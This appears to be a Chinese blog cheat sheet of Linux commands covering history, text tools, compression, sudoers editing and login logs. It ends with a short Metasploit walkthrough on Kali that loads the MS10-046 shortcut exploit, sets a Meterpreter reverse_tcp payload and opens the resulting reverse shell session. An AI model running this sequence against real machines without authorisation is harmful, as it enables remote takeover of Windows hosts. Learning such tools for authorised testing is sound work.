mesg 发送信息给root y n
write/talk 写消息给
wall 给所有用户发送消息
ps -aux ps -elF
pstree
命令行跳转:CTRL+a行首 CTRL+e行尾 CTRL+u清除光标左侧至开头 CTRL+k清除光标右侧至结尾 CTRL+左右键
history -c 清除所有命令 history -d 500 10 从第500个历史开始 删除10个命令记录
tr 'a-z' 'A-Z' 替换命令
wc -l
grep --color -i -v显示没有被模式匹配到的行
sed(Stream EDitor) 流编辑器 - 行编辑器
awk
给文件添加特殊权限 suid: chmod u+s FILENAME SGID
查看用户登录情况及日志: w whoami who last所有登录主机用户时间日志 lastb登录错误日志 lastlog所有用户登录日志总揽 mail查看邮件
命令gzip bzip2 xz 压缩文件,并且会删除原文件, 解压缩gunzip zcat bzcat查看压缩文件 但是不解压 这几个命令是无法压缩文件夹的,只能压缩文件
zip 可以压缩文件夹, 并且得指定压缩后文件名xxx.zip 不删除源文件
tar -xzvf解压缩并展开归档 -czvf归档并压缩
visudo 专门用来编辑 /etc/sudoers 1)chmod u+w /etc/sudoers 2) vi /etc/sudoers user1 ALL=(ALL) ALL 这就使得用户user1,可以使用sudo命令,执行超级权限了。 3) 最后撤销/etc/sudoer文件的权限 chmod u-w /etc/sudoers
kali下metaexploit使用:
msfconsole进入msf
armitage图形化界面
exploit模块:
use exploit/windows/brower/ms10_046_shortcut_icon_dllloader //使用哪个exploit
show options //查看需要配置的参数
set SRVHOST 192.XXX
set PAYLOAD windows/meterpreter/reverse_tcp //配置exploit成功后 使用的payload
show options
set LHOST 192.XXX
sessions -i 1 //如果攻击成功 进入攻击成功后获取的反弹的CMDSHELL
auxiliary模块:
use auxiliary/scanner/portscan/syn
浙公网安备 33010602011771号